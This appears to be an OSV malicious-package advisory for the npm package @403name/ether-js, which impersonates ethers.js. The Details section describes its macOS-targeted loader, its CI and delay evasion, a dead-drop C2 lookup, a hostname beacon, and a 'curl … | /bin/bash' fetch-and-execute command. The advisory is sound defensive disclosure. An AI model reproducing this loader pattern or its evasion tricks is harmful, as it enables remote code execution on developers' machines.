MAL-2026-5548

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/ether-js/MAL-2026-5548.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5548
Published
2026-06-11T03:14:52Z
Modified
2026-06-11T04:01:30.670643837Z
Summary
Malicious code in @403name/ether-js (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef)

On require('@403name/ether-js'), index.js runs an IIFE that targets macOS only (returns early on non-darwin and when CI/GITHUB_ACTIONS env vars are set), writes a one-shot marker at ~/.cache/.nyx-npm/e, waits a randomized 30-90s, then fetches a C2 base URL from https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt. It beacons the installer's USER env var and os.hostname() to <c2>/api/clickfix-callback via curl, then spawns '/bin/sh -c' with curl -sSfL <c2>/api/payload/ | /bin/bash (detached, disowned) — full remote code execution on the developer's machine under attacker control. A Russian-language comment in the source explicitly states the design avoids lifecycle scripts to be 'invisible to npm audit'. The package name and description impersonate the popular ethers.js library ('Compatible with ethers.js API patterns for easy migration'), and the shipped keccak256 is a stub returning random hex rather than a real hash — confirming the package is a lure, not a functional library. The evasion pattern (platform gate, CI gate, randomized delay, one-shot marker) combined with the two-stage dead-drop-to-C2 fetch-and-exec is conclusive malicious intent.

Database specific 
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005447",
            "versions": [
                "1.0.1"
            ],
            "sha256": "1b8b80784e81444c1b77d58f0b521b3ddb96f91d634bce1f91a0ff6b2f2547de",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T03:14:52Z",
            "import_time": "2026-06-11T03:48:52.53109909Z"
        },
        {
            "id": "IN-MAL-2026-005450",
            "versions": [
                "1.0.0"
            ],
            "sha256": "927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T03:15:08Z",
            "import_time": "2026-06-11T03:48:52.872397817Z"
        }
    ]
}
References
Credits

Affected packages

npm / @403name/ether-js

Package

Name
@403name/ether-js
View open source insights on deps.dev
Purl
pkg:npm/%40403name%2Fether-js

Affected ranges

Affected versions

1.*
1.0.0
1.0.1

Database specific

indicators 
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "fe52919155d4cbef5d801975f9daefa3a2881c12b53b75fccf424422a2d83678",
            "tlsh": "7991a5c8bae77060ba261171462fb41525eef0b302cccd68b56cd1066fe5b289b79df4"
        },
        {
            "path": "package.json",
            "sha256": "875e76bd156ecad8b3b5e88720d3ef0ca1c0312482d8a49e1db235c7ed0e1f14",
            "tlsh": "c4014ca1c6251ca31bdc2dd95e597241b252480749447c1973c7c02e8b8f69f52fe78c"
        }
    ],
    "package_integrity": [
        {
            "filename": "ether-js-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-i6hyQS+8GnwaNIUjfFWlI4ztOM7m3wv+d3ial+hhI4lc1aFTC5Q7BY1NPfW3rM8l0sedMR5cOrM/vdHR4v4gFw==",
                "sha1": "335802d372117cd58855351dacbb13641c0e2fda"
            }
        }
    ]
}
cwes 
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/ether-js/MAL-2026-5548.json"